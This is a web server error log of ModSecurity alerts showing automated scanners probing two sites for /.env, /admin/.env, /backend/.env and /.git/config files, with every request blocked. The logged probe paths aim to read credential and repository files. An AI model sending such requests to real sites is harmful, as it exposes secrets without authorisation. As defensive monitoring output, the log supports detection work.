[Sun Jul 20 04:15:03.219284 2025] [:error] [pid 1314985] [client 170.39.218.51:52686] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aHxRJ4pehbmBRYUOSjdIfQAAAAA"]
[Sun Jul 20 04:15:03.219469 2025] [:error] [pid 1314985] [client 170.39.218.51:52686] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aHxRJ4pehbmBRYUOSjdIfQAAAAA"]
[Sun Jul 20 04:15:04.744562 2025] [:error] [pid 1314988] [client 170.39.218.51:52722] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aHxRKHg0DXtJ9bAqCnDPUgAAAAM"]
[Sun Jul 20 04:15:04.744833 2025] [:error] [pid 1314988] [client 170.39.218.51:52722] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aHxRKHg0DXtJ9bAqCnDPUgAAAAM"]
[Sun Jul 20 04:15:04.744989 2025] [:error] [pid 1314988] [client 170.39.218.51:52722] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aHxRKHg0DXtJ9bAqCnDPUgAAAAM"]
[Sun Jul 20 04:15:04.918495 2025] [:error] [pid 1314985] [client 170.39.218.51:52732] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aHxRKIpehbmBRYUOSjdIfgAAAAA"]
[Sun Jul 20 04:15:04.918828 2025] [:error] [pid 1314985] [client 170.39.218.51:52732] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aHxRKIpehbmBRYUOSjdIfgAAAAA"]
[Sun Jul 20 04:15:04.919001 2025] [:error] [pid 1314985] [client 170.39.218.51:52732] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aHxRKIpehbmBRYUOSjdIfgAAAAA"]
[Sun Jul 20 04:15:05.235195 2025] [:error] [pid 1314992] [client 170.39.218.51:52744] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aHxRKeW0iVD4Ji7MykG8TwAAAAU"]
[Sun Jul 20 04:15:05.235448 2025] [:error] [pid 1314992] [client 170.39.218.51:52744] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aHxRKeW0iVD4Ji7MykG8TwAAAAU"]
[Sun Jul 20 04:15:05.235613 2025] [:error] [pid 1314992] [client 170.39.218.51:52744] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aHxRKeW0iVD4Ji7MykG8TwAAAAU"]
[Sun Jul 20 19:19:28.060378 2025] [:error] [pid 1321410] [client 198.55.98.91:34562] [client 198.55.98.91] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aH0lII6CQnh4O_dEfHZ1DwAAAAs"]
[Sun Jul 20 19:19:28.061358 2025] [:error] [pid 1321410] [client 198.55.98.91:34562] [client 198.55.98.91] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aH0lII6CQnh4O_dEfHZ1DwAAAAs"]
[Sun Jul 20 19:19:28.061544 2025] [:error] [pid 1321410] [client 198.55.98.91:34562] [client 198.55.98.91] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aH0lII6CQnh4O_dEfHZ1DwAAAAs"]
[Mon Jul 21 22:13:44.543612 2025] [:error] [pid 1359628] [client 185.177.72.202:55854] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aH6feMSaeLrJatbMz7FSoAAAAAE"]
[Mon Jul 21 22:13:44.543878 2025] [:error] [pid 1359628] [client 185.177.72.202:55854] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aH6feMSaeLrJatbMz7FSoAAAAAE"]
[Mon Jul 21 22:13:44.544036 2025] [:error] [pid 1359628] [client 185.177.72.202:55854] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aH6feMSaeLrJatbMz7FSoAAAAAE"]
[Tue Jul 22 06:02:16.870914 2025] [:error] [pid 1366311] [client 93.123.109.7:46016] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aH8NSIfXeHd4PkoXBcg9BAAAAAI"]
[Tue Jul 22 06:02:16.871219 2025] [:error] [pid 1366311] [client 93.123.109.7:46016] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aH8NSIfXeHd4PkoXBcg9BAAAAAI"]
[Tue Jul 22 06:02:16.871375 2025] [:error] [pid 1366311] [client 93.123.109.7:46016] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aH8NSIfXeHd4PkoXBcg9BAAAAAI"]
[Tue Jul 22 15:21:25.013473 2025] [:error] [pid 1372369] [client 216.81.248.58:41898] [client 216.81.248.58] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aH-QVfro7sHPq_Mk7EhLwAAAAAg"]
[Tue Jul 22 15:21:25.013762 2025] [:error] [pid 1372369] [client 216.81.248.58:41898] [client 216.81.248.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aH-QVfro7sHPq_Mk7EhLwAAAAAg"]
[Tue Jul 22 15:21:25.013924 2025] [:error] [pid 1372369] [client 216.81.248.58:41898] [client 216.81.248.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aH-QVfro7sHPq_Mk7EhLwAAAAAg"]
[Wed Jul 23 06:18:46.326075 2025] [:error] [pid 1392107] [client 185.177.72.9:48562] [client 185.177.72.9] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIBipii7MZQTXQmUV0d1zAAAAAY"]
[Wed Jul 23 06:18:46.326356 2025] [:error] [pid 1392107] [client 185.177.72.9:48562] [client 185.177.72.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIBipii7MZQTXQmUV0d1zAAAAAY"]
[Wed Jul 23 06:18:46.326509 2025] [:error] [pid 1392107] [client 185.177.72.9:48562] [client 185.177.72.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIBipii7MZQTXQmUV0d1zAAAAAY"]
[Wed Jul 23 23:06:19.102175 2025] [:error] [pid 1394030] [client 93.123.109.64:44324] [client 93.123.109.64] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aIFOy2Lf3YH1pNufNzf6YAAAAAc"]
[Wed Jul 23 23:06:19.103490 2025] [:error] [pid 1394030] [client 93.123.109.64:44324] [client 93.123.109.64] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aIFOy2Lf3YH1pNufNzf6YAAAAAc"]
[Wed Jul 23 23:06:19.103653 2025] [:error] [pid 1394030] [client 93.123.109.64:44324] [client 93.123.109.64] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aIFOy2Lf3YH1pNufNzf6YAAAAAc"]
[Thu Jul 24 04:32:23.578787 2025] [:error] [pid 1416198] [client 185.177.72.3:22694] [client 185.177.72.3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIGbNz45iUZLoiIIM9gqagAAAAQ"]
[Thu Jul 24 04:32:23.579138 2025] [:error] [pid 1416198] [client 185.177.72.3:22694] [client 185.177.72.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIGbNz45iUZLoiIIM9gqagAAAAQ"]
[Thu Jul 24 04:32:23.579311 2025] [:error] [pid 1416198] [client 185.177.72.3:22694] [client 185.177.72.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIGbNz45iUZLoiIIM9gqagAAAAQ"]
[Fri Jul 25 12:29:46.163574 2025] [:error] [pid 1449493] [client 185.177.72.236:33906] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aINcmgv2x0mE7dLJUMKcRwAAAAA"]
[Fri Jul 25 12:29:46.165027 2025] [:error] [pid 1449493] [client 185.177.72.236:33906] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aINcmgv2x0mE7dLJUMKcRwAAAAA"]
[Fri Jul 25 12:29:46.165198 2025] [:error] [pid 1449493] [client 185.177.72.236:33906] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aINcmgv2x0mE7dLJUMKcRwAAAAA"]
[Sat Jul 26 00:49:13.815132 2025] [:error] [pid 1461846] [client 3.138.185.30:46197] [client 3.138.185.30] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aIQJ6XIEKsQxAWMPPhH2owAAAA4"]
[Sat Jul 26 00:49:13.815542 2025] [:error] [pid 1461846] [client 3.138.185.30:46197] [client 3.138.185.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aIQJ6XIEKsQxAWMPPhH2owAAAA4"]
[Sat Jul 26 00:49:13.815732 2025] [:error] [pid 1461846] [client 3.138.185.30:46197] [client 3.138.185.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aIQJ6XIEKsQxAWMPPhH2owAAAA4"]
[Mon Jul 28 04:03:41.716421 2025] [:error] [pid 1515929] [client 206.189.84.135:34184] [client 206.189.84.135] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIbafYDlDWLN7Jhc4DOkmwAAAAI"]
[Mon Jul 28 04:03:41.724533 2025] [:error] [pid 1515929] [client 206.189.84.135:34184] [client 206.189.84.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIbafYDlDWLN7Jhc4DOkmwAAAAI"]
